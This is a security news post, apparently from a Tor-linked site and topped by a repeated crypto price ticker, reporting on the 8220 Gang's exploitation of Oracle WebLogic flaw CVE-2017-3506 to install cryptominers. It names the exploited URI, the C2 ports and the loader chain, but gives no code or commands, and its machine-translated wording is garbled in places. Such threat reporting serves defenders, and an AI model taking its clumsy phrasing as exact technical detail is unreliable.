BTC $55865.7639
ETH $3222.4858
BNB $400.6682
SOL $110.6842
XRP $0.5548
ADA $0.6230
AVAX $39.2767
DOGE $0.0896
TRX $0.1404
wstETH $3751.1765
LINK $19.0474
DOT $8.0594
WETH $3236.9354
MATIC $1.0625
UNI $10.5983
WBTC $55965.3668
IMX $3.3901
ICP $13.0143
BCH $300.6764
LTC $74.8911
CAKE $3.2355
FIL $8.1517
ETC $28.1561
RNDR $7.4096
KAS $0.1718
DAI $0.9979
HBAR $0.1117
ATOM $11.3293
VET $0.0491
INJ $36.5642
TON $2.1072
OKB $51.3395
LDO $3.5443
FDUSD $1.0015
STX $3.0723
ARB $1.9162
NEAR $4.0168
XMR $131.7677
TIA $17.0755
XLM $0.1186
GRT $0.2823
ENS $22.2643
THETA $2.1117
MKR $2155.4331
WEMIX $2.1023
APEX $2.4575
BEAM $0.0357
BTC $55865.7639
ETH $3222.4858
BNB $400.6682
SOL $110.6842
XRP $0.5548
ADA $0.6230
AVAX $39.2767
DOGE $0.0896
TRX $0.1404
wstETH $3751.1765
LINK $19.0474
DOT $8.0594
WETH $3236.9354
MATIC $1.0625
UNI $10.5983
WBTC $55965.3668
IMX $3.3901
ICP $13.0143
BCH $300.6764
LTC $74.8911
CAKE $3.2355
FIL $8.1517
ETC $28.1561
RNDR $7.4096
KAS $0.1718
DAI $0.9979
HBAR $0.1117
ATOM $11.3293
VET $0.0491
INJ $36.5642
TON $2.1072
OKB $51.3395
LDO $3.5443
FDUSD $1.0015
STX $3.0723
ARB $1.9162
NEAR $4.0168
XMR $131.7677
TIA $17.0755
XLM $0.1186
GRT $0.2823
ENS $22.2643
THETA $2.1117
MKR $2155.4331
WEMIX $2.1023
APEX $2.4575
BEAM $0.0357
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Script kiddy group 8220 The group has matured and accepted new user attacks

    Perhaps the cloud technology group has changed its goals in using Oracle technologies.

    Trend Micro specialists introduced a new general grouping 8220 (8220 Mining Group), during which hackers exploited a 6-year-old Oracle WebLogic vulnerability to deliver a cryptominer to an infected system.

    The attacks used vulnerability CVE-2017-3506 (CVSS: 7.4), which is present on the WLS Security component in Oracle WebLogic and allows distribution of remotely applied broadband commands via an HTTP request with a specially crafted XML document. The flaw makes it possible to gain unauthorized access to confidential data or compromise the system.

    The 8220 exploited the HTTP URI "wls-wsat/CoordinatorPortType" to infiltrate the system. After logging in, the hackers delivered a PowerShell script that downloaded an executable file (including cryptominers) from the IP address of the command and control server (C2 server).

    The upload file loads a DLL that is injected into the MS Build process. The DLL file is securely obfuscated to make it harder for analysts to work. The DLL configuration information is Base64 encoded, the new linking process is performed by three C2 servers using the same TCP port 9090, 9091 or 9092 to download the cryptominer.

    In recent attacks, the group also used "lwp-download", a Linux utility to download a file from a specified URL. Observers have also observed the use of this utility to hack Windows systems.

    Abuse of "lwp-download" can be expected in the short term to compromise and target another platform. Despite the reuse of tools and C2 servers, the 8220 group began to attack the Windows system and use new files and C2 servers to bypass detections.

    Earlier, security investigators from Fortinet FortiGuard Labs reported that the 8220 Gang cryptominer group is delivering a new ScrubCrypt encryptor to the system, and cryptojacking has been received. The chain of attacks begins with the exploitation of Oracle WebLogic servers to download PowerShell scripts hosting ScrubCrypt.

    Experts name 8220 low-skilled financially motivated hackers who penetrate AWS, Azure, GCP, Alitun and QCloud hosts using vulnerabilities in Docker, Redis, Confluence and Apache. In addition, the group has its own cryptominer called PwnRig, based on the XMRig miner. PwnRig uses a fake FBI subdomain with an IP address pointing to a Brazilian government resource.

    Author DeepWeb
    SideWinder militantly masquerades as Pakistani and Chinese government agencies in their latest attacks
    FIN7 hackers are back with a new ransomvar Clop

    Comments 0

    Add comment